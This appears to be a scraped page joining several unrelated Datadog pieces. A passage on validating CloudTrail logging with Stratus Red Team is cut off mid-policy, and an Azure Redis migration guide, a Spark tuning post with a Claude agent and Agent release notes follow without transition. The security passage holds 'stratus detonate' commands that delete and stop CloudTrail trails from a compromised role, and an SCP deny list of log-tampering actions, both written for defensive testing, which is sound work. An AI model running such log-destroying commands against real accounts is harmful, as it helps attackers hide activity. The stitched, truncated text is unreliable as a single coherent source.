The Stratus Red Team techniques for actions such as deleting AWS CloudTrail trails and stopping logging altogether fulfill two purposes for validating account-level cloud logging scenarios that fall outside of established organization trails. First, they confirm if calls are blocked by available policies, and second, if attempts are visible in your account's cloud logs. When attempts are visible, your logs will capture those calls the moment they are made, regardless of whether they succeed or are blocked.

The following commands set up the defense evasion scenario for a compromised role:

export AWS_PROFILE=compromised-role
stratus detonate aws.defense-evasion.cloudtrail-delete
stratus detonate aws.defense-evasion.cloudtrail-stop

The Stratus Red Team techniques for deleting or stopping cloud logging include a warmup step that uses the cloudtrail:CreateTrail permission to create new trails within the profile's associated AWS account before detonating attacks against them. CreateTrail has legitimate uses, such as centralizing logging pipelines and managing audit logs for incident response, so it's not uncommon to find it granted in real environments.

Confirm that calls are blocked by available SCP policies

Most roles, such as those for application services and CI/CD pipelines, have no legitimate reason to modify CloudTrail trails, so those calls are candidates for an SCP policy. You can attach SCPs to an organization, organization unit, or member account, creating the perimeter boundary for control plane actions such as disabling logging. That means that an appropriate SCP will block an identity—in this case, the compromised-role profile—from executing cloudtrail:DeleteTrail and cloudtrail:StopLogging calls.

The following example SCP denies modifications to a member account's CloudTrail trails:

{
   "Version":"2012-10-17",
   "Statement":[
      {
         "Effect":"Deny",
         "Action":[
            "cloudtrail:DeleteTrail",
            "cloudtrail:PutEventSelectors",
            "cloudtrail:StopLogging",
            "cloudtrail:UpdateTrail"
         ],
         "Resource":"*",
         "Condition":{
            "ArnNotLike":{
               "aws:PrincipalARN":"arn:aws:iam::123456789012:role/AWSCloudTrailAdmin"
            }
         }
      }
   ]
}

The cloudtrail:PutEventSelectors action is included in the deny policy because that call would enable an attacker to narrow which events get logged without disabling logging entirely, which minimizes the likelihood of detection. The cloudtrail:UpdateTrail action accounts for an attacker redirecting log delivery to an external S3 bucket, which makes the logs inaccessible to your team. The ArnNotLike condition ensures that a specific privileged role still has access to modify trails. For the account with this SCP attached, the Stratus Red Team techniques for cloudtrail:StopLogging and cloudtrail:DeleteTrail actions would be denied.

Note that SCPs do not apply to your cloud management account, where you create and apply organization-level policies. A compromised principal in that account can call cloudtrail:StopLogging regardless of your SCPs, which is why access to a high-privilege management account needs to be treated as a separate security risk.

Confirm that attempts are visible in CloudTrail logs

Even if an attempt to modify cloud logging is blocked, you want to confirm that CloudTrail recorded each event. The attempt itself is suspicious since logging is a required security benchmark. Because the Stratus Red Team techniques act on the trails they create within a member account, your organization-level trail should capture the detonation events, whether the attempt succeeds or is blocked by an SCP.

You can read AWS's guide on managing CloudTrail costs and our guide on configuring AWS CloudTrail logs for more information about how to collect them and which events are important to capture.

Enforcing an identity perimeter on your AWS account

One of the control objectives for the identity perimeter is ensuring that only your organization's principals and the AWS services acting on their behalf can access your resources. According to our report, the majority of organizations with data perimeters enforce this control primarily through policies on individual Amazon S3 buckets. Per-resource policies offer granular control, but they introduce gaps in policy coverage as your environment grows. They also create issues with policy durability when one can be modified by any principal with the right permissions.

The following bucket policy illustrates how organizations typically start building per-resource identity controls for a log bucket:

{
   "Version":"2012-10-17",
   "Statement":[
      {
         "Sid":"AllowCloudTrailWrite",
         "Effect":"Allow",
         "Principal":{
            "Service":"cloudtrail.amazonaws.com"
         },

Azure Managed Redis is a Microsoft first-party, fully managed in-memory data store, replacing Azure Cache for Redis tiers. It includes Redis Enterprise features such as RediSearch for vector search and full-text search, in addition to RedisJSON, RedisTimeSeries, and Active Geo-Replication. As Azure Cache for Redis reaches end of life, more teams are planning migrations to Azure Managed Redis in search of better performance, lower cost, and modern capabilities for AI and real-time workloads.

Cache migrations are deceptively risky. Redis often handles latency-sensitive user requests, so an undersized cache, a misconfigured client, or a forgotten dependent service can result in immediate user-visible slowness or outages. Two things make the difference between a clean migration and an unsuccessful one: a single observability layer covering both sides of the cutover, and a reliable way to move data and traffic. Together, Datadog and Eden meet both requirements.

Datadog provides unified observability across the legacy cache and the new Managed Redis deployment, helping teams capture premigration performance, monitor the cutover, and validate performance after migration. Eden provides the app-aware execution layer for data replication, traffic routing, dual-write consistency, and instant rollback.

In this post, we'll explore how you can use Datadog and Eden to:

  • Establish performance baselines for the legacy cache before you migrate

  • Move the data and shift traffic with zero downtime

  • Monitor the cutover with side-by-side dashboards

  • Validate parity between the legacy cache and the new cache

  • Keep your Azure Managed Redis cache healthy after the migration

Establish performance baselines for the legacy cache before you migrate

The first migration question is also the hardest: Which Managed Redis configuration should you choose, and how many shards do you actually need? Guessing can lead to an underprovisioned cache that regresses application latency or an overprovisioned cache that wastes the cost savings the migration was supposed to deliver.

Datadog's existing Azure Cache for Redis integration and Redis integration capture the data needed to size the new cache. Use the out-of-the-box (OOTB) dashboards to extract baselines from a representative window, ideally one that includes a peak traffic event. Focus on the following metrics:

  • Peak operations per second: indicates the throughput tier you need

  • p99 cache latency: establishes the latency target that the new cache should match or improve on

  • Working set size (used memory at steady state): tells you the minimum memory configuration for the new instance

  • Hit rate: confirms how dependent your application is on cache effectiveness, which sets the bar for postmigration validation

  • Connection counts and connection churn: guide cluster sizing and reveal client pools that might need tuning before cutover

Save the baselines as Datadog notebooks so that you can refer back to them during and after the migration. You can use the same numbers to size the new instance and choose the right migration strategy. For example, a high-traffic, customer-facing system often benefits from a gradual rollout rather than a quick cutover.

You also should create an anomaly-based monitor on the legacy cache during the planning phase. If a load test or a misbehaving deployment spikes traffic in a way that would invalidate your sizing assumptions, you want to know before you begin the migration.

Move the data and shift traffic with zero downtime

With your baselines captured, the next step is to use Eden to handle the data-movement aspect of the migration. Eden's migration layer, Exodus, sits in front of both caches. You don't need to write replication code, modify your applications, or schedule a maintenance window, so you can migrate with zero downtime. With Exodus, you can:

  • Replicate data from the legacy cache to the new Managed Redis instance so that the new cache is ready to serve traffic

  • Choose a cutover strategy (canary, blue/green, tenant-by-tenant, or big bang) and let Exodus shift traffic on your schedule

  • Mirror writes to both caches during cutover so that they stay in sync

  • Throttle adaptively so that neither the legacy cache nor the new cache is overwhelmed during peak load

  • Compare responses in replicated read mode to catch feature or module incompatibilities before users notice them

  • Roll back instantly at any stage if a regression occurs

Monitor the cutover with side-by-side dashboards

While Exodus runs the cutover, you can use Datadog to catch regressions early and confirm that dependent services stay healthy as traffic shifts. Exodus runs both caches in parallel and shifts traffic from the legacy cache to the new Managed Redis instance gradually, so you can watch the new cache pick up real production traffic before you fully commit to it.

The risk in this stage is not the data movement; it's the applications that depend on the cache. In a microservices environment, dozens of services often share a single cache. A forgotten configuration change can leave one service pointed at the legacy endpoint while everything else has shifted to the new cache, producing inconsistent behavior that is difficult to diagnose later.

Datadog's Software Catalog and APM traces help you identify dependent services and verify that each one migrates correctly. Filter the Software Catalog by your existing cache resources to see the upstream and downstream services that connect to it, along with the request volume that each service generates. Use this list as your cutover checklist. As you point each service to the new Managed Redis endpoint, watch for trace metrics from the new cache resource to appear in APM. Confirm that the legacy resource's traffic drains toward zero.

During cutover, display the metrics from both caches side by side in the same Datadog dashboard. Tag each environment clearly (for example, cache:legacy and cache:managed-redis) so that a single widget can show the new cache's hit rate climbing as the legacy cache's traffic drains. If the new cache begins to diverge from the legacy cache's baselines during cutover, the side-by-side view helps you identify regressions quickly and decide whether to roll back the migration.

To make rollback decisions automatic, configure short-lived cutover monitors specifically for the migration window:

  • Latency divergence monitor: Alert if p99 latency on the new cache trends meaningfully higher than the legacy baseline. Catches sizing or networking issues early enough to roll back.

  • Error-rate divergence monitor: Alert if the new cache's error rate exceeds the legacy cache's error rate by more than a small margin. Often signals a client compatibility issue.

  • Hit-rate divergence monitor: Alert if the new cache's hit rate falls materially below the legacy baseline after a representative volume of traffic has shifted. Catches working-set or time-to-live (TTL) drift before users feel it.

Delete these monitors after the cutover is complete.

Validate parity between the legacy cache and the new cache

The migration is not finished the moment that traffic shifts. The real test is whether the new cache holds up across a full traffic cycle, including peak hours, batch jobs, and any usage patterns that the legacy cache was tuned for.

Compare the metrics from the Azure Managed Redis Overview dashboard against the baseline values that you captured in the planning stage:

  • Latency at p95 and p99 should match or improve on the legacy baselines. If it regresses, check server_load and percent_processor_time to confirm whether the gap is saturation or configuration.

  • Hit rate should be at or above the baseline after the new cache has warmed for one or two traffic cycles. A persistent gap usually means that TTL values need tuning or that a working set has grown beyond the cache configuration.

  • Used memory percentage and eviction rate should both be well below the legacy baselines if you sized the new cache correctly. A high eviction rate is the clearest sign that you need to scale up before regressions cascade.

Once you validate that the new cache matches the legacy deployment in performance and behavior, you can decommission the legacy cache. If you want a final side-by-side check before you decommission the cache, Datadog dashboards show both of the cache environments and their dependent applications in the same view throughout the validation window.

Keep your Azure Managed Redis cache healthy after migration

With the migration complete, the focus shifts to keeping the new cache healthy as it absorbs the full weight of production traffic. Dashboards are useful while a human is watching them, but monitors protect the cache the rest of the time. Configure monitors that cover the four most common issues that affect Redis cache performance:

  • Saturation: Alert on sustained high server load or CPU utilization, the clearest leading indicator of latency regressions.

  • Efficiency: Alert when the hit-to-miss ratio drops below your target, which usually means that TTL values need tuning or a working set has outgrown the cache configuration.

  • Memory pressure: Alert when memory utilization climbs and evictions begin so that you can investigate before the cache evicts frequently accessed data.

  • Availability: Alert on geo-replication health for any cache in an Active Geo-Replication group so that you can address issues before a failover exposes them.

When an alert fires, Datadog provides the troubleshooting surface to resolve it. The Managed Redis dashboard, APM traces from the applications calling the cache, and logs from surrounding services all live in the same workspace. As a result, you can cross-reference a saturation alert against the deployments, traffic spikes, or upstream issues that might have caused it.

Rely on Datadog and Eden for your Azure Managed Redis migration

For teams moving from Azure Cache for Redis to Azure Managed Redis, Datadog and Eden together support the full migration process. Datadog provides observability across the legacy cache, the new instance, and the applications that depend on either. Eden, meanwhile, moves the data and the traffic with zero downtime. As an official Microsoft Cloud Adoption Framework partner, Datadog supports the full Azure migration life cycle by helping teams apply consistent observability practices across Redis, compute, storage, and other Azure services.

To learn more, read Datadog's Azure Managed Redis integration documentation. To start a Redis migration with Eden, see Eden's Redis migration page.

If you're new to Datadog, you can sign up for a 14-day free trial to start monitoring your Azure Managed Redis caches.

Spark jobs only get more expensive and harder to debug as they scale. It's a problem we've run into ourselves. Our Referential Data Platform team builds and maintains the knowledge graph that maps relationships between customers' observability entities. ServiceQueryEdge is at the center of that graph, mapping service entities to their associated metric and log queries. It runs daily across seven datacenters, with individual partitions processing up to 27 TB of input and 16 billion records. At that scale, we were averaging $1.5k of infrastructure costs daily, with each run taking over 17 hours.

AI agents seemed like a natural fit for this problem. They're good at reasoning over code, connecting symptoms to root causes, and generating hypotheses quickly. But an agent working from code alone is still guessing. It needs to know what's actually slow.

In this post, we'll walk through how we used Datadog's Data Observability Jobs Monitoring and an AI agent built on Claude to debug and optimize ServiceQueryEdge. We'll cover what worked, what didn't, and the specific changes that cut our daily compute costs by 44% and reduced run duration by 60% in US1, our largest data center.

Closing the gap between Jobs Monitoring and the codebase

To understand where inefficiencies are, we rely on Jobs Monitoring with the Spark SQL Plan to get a visual, interactive representation of the full execution plan. However, even with that visibility, correlating a slow operator in the SQL Plan back to the relevant section of application code can still take time, particularly for a large, complex job like ServiceQueryEdge.

To speed up debugging, we built an AI agent to surface any bottlenecks across the execution graph and suggest fixes. We created a custom prompt structure that ingests the same data shown in Jobs Monitoring, such as stage metrics, the SQL execution plan, and telemetry data, alongside the source code. This allows the agent to perform correlation work that would usually fall on one of the team's engineers, saving up to hours of manual investigation. For every issue the agent flags, the engineer lands directly at the relevant node with context on why it matters.

Getting signal from noise: scoping data for AI-assisted debugging

At first, we ran into problems with Claude depleting its context while making Model Context Protocol (MCP) calls through our Datadog MCP Server to collect Spark data from Jobs Monitoring. The agent pulled job run telemetry data, represented as traces, using the get_datadog_trace, apm_search_spans, and apm_explore_trace tools. Multiple runs made the problem worse. The agent exhausted its context window before completing meaningful analysis. Suggestions became incomplete or incoherent.

We alleviated this by using subagents that delegated the acquisition of specific information into targeted tasks, preserving context for the analysis work that actually mattered. Agent output quality depended less on data volume than on how precisely that data was scoped.

However, the agent's initial suggestions didn't work. Many recommendations were either off target or addressed symptoms rather than root causes. For example, the agent suggested pruning column reads to reduce data read in, which was redundant because Spark had already handled that optimization.

Our first instinct was to try reducing the noise by feeding deeper embeddings of Spark runtime info and metrics from Jobs Monitoring into the agent. The additional context helped the agent identify more issues and generate more recommendations. But false positives also increased significantly.

Our next step was to add another subagent that filtered issues we deemed irrelevant or perfunctory. The validator works as a grader rather than a generator. It pulls the same context as the main agent, job health and the SQL plan, but its job is to find reasons a proposed fix won't work.

Optimization #2: Apply spam filter before the main join (line 766)

  Contraindication Checks:
  1. ❌ Does the spam filter actually reduce significant rows? — The LeftAnti join outputs 3,406,939,340 rows — same as the left input (3,406,939,340 from the Exchange). This means the 628 spammy metrics contribute near-zero rows to the 3.4B total. The spam filter removes metrics by (org_id, metric_id) but the main join key is (org_id, metric_name). Even if these 628 metrics were removed earlier, the 3.4B metrics-side of the main join would barely decrease.
  2. ✅ Is the filter already applied before the main join? — Looking at the data flow: metricsWithTagsRaw → spam filter → metricsWithTags → salt → metricsWithTagsSalted → main join at line 766. The spam filter IS already applied before the main join in the code.
  3. ❌ Would earlier filtering help? — The spam filter requires a groupBy($"org_id", $"metric_id").agg(countDistinct(...)) over the full metricsWithTagsRaw. This aggregation itself is expensive. Moving it "earlier" doesn't change the fact that you need the full dataset to compute the counts.

The validator's output looks like a peer review. For each suggestion, it lists checks using metrics from Jobs Monitoring and the code. If most checks fail, we discard the suggestion before wasting engineering time. The validator caught that many of the agent's top suggestions came down to implementing optimizations Spark was already doing automatically.

From theory to improvement: What actually worked

With the validator in place, we concentrated on the issues that passed scrutiny. Three optimizations proved most impactful: salting, join reordering, and broadcast hints.

Optimization 1: Salting

The SQL plan showed a 65.5% skew ratio on a large join. Salting is a technique to artificially add randomness to join keys to distribute data more evenly. It's a well-known mitigation but can introduce overhead.

The agent and validator had a back-and-forth about this one. The agent correctly identified skew on the service-metrics join. The validator confirmed that this specific join was neither broadcast nor pre-partitioned, so skew was a real problem. The implementation was standard: add salt values to both sides of the join on the service side, which already had ~1TB of memory at that stage of execution.

Result: 24% reduction in executor time on that stage

Optimization 2: Join reordering

The execution plan had a chain of joins where smaller intermediate results were being joined last, after building up massive datasets first. The agent suggested reordering to put smaller-cardinality joins earlier in the chain.

Here the validator was skeptical. It checked whether the join keys changed and whether reordering would trigger repartitions. Since these joins shared keys, reordering was safe.

Result: 15% reduction in overall execution time

Optimization 3: Broadcast hints

For one join involving a 500 MB mapping table, the agent recommended a broadcast hint to send the small side to all executors instead of shuffling both sides. The validator confirmed the size threshold was appropriate and the join type supported broadcasting.

Result: 8% reduction in executor time on that specific stage

Combined, these three changes cut daily infrastructure costs by 44% (from $1.5k to roughly $840) and reduced job runtime from 17 hours 20 minutes to about 7 hours in our largest data center. Other improvements came incrementally but summed meaningfully.

What we learned

Data matters more than volume. At the beginning, we pumped massive amounts of trace data into the agent. It wasn't helping. Once we narrowed the scope—focusing on slow operators, stage metrics, and the surrounding code—suggestions became concrete and actionable.

Validation is essential. The biggest breakthrough came from adding a second agent to validate claims. Engineers spend a lot of time on rabbit holes chasing optimizations that don't help. A validator that reasons backward from "would this fix actually improve the metric?" saves that time.

Jobs Monitoring provides the critical context. SQL plans, stage metrics, and executor metrics are what let an agent make informed recommendations. Without them, an agent is guessing based on code patterns alone. With them, it can connect symptoms in the runtime to their causes in the codebase.

Agentic AI is most useful for the correlation work. We didn't use the agent to write optimized code. We used it to surface possibilities that the team then evaluated and refined. That's where the leverage is: finding the high-value problems and putting the right person in front of the data to solve them.

For organizations running large-scale Spark workloads, the combination of Jobs Monitoring and agentic AI can compress what would normally be hours or days of manual profiling and debugging into a workflow where an engineer stays focused on evaluation and impact.

If you're running Spark jobs and want to see bottlenecks the way we do, get started with Datadog's Data Observability or explore how Bits AI Agents can help with troubleshooting.

Datadog Agent · v7.79.1

Agent

Prelude

Released on: 2026-05-28

Security Notes
  • Bump github.com/prometheus/prometheus to v0.311.4 to address CVE-2026-42151 and CVE-2026-42154.
Bug Fixes
  • Windows: Fix CD-ROM drives being monitored by the disk check since Agent 7.73.0. The diskv2 check now uses the Windows GetDriveType() API to properly detect and exclude CD-ROM drives, matching the behavior of the previous Python disk check. This fixes false alerts on system.disk.in_use for CD-ROM drives with inserted media.
  • Fix a bug in the workload autoscaling controller where annotation-only edits (e.g. autoscaling.datadoghq.com/preview) on a locally-owned DatadogPodAutoscaler were not picked up until the next .spec change or cluster-agent restart, because the controller gated re-sync on .metadata.generation (which annotations do not bump). Toggling burstable mode via the preview annotation now takes effect on the next reconcile.
  • MacOS agent GUI app needs to ignore SIGPIPE to avoid process termination.
  • On macOS, preserve user customizations to system-probe.yaml across Agent upgrades.
  • Fixed a bug on Windows where the NPM TCP failure rate could exceed 100% and climb indefinitely.

Datadog Cluster Agent

Prelude

Released on: 2026-05-28 Pinned to datadog-agent v7.79.1: CHANGELOG.

Last Checked
just now
Tracking since Jul 9, 2015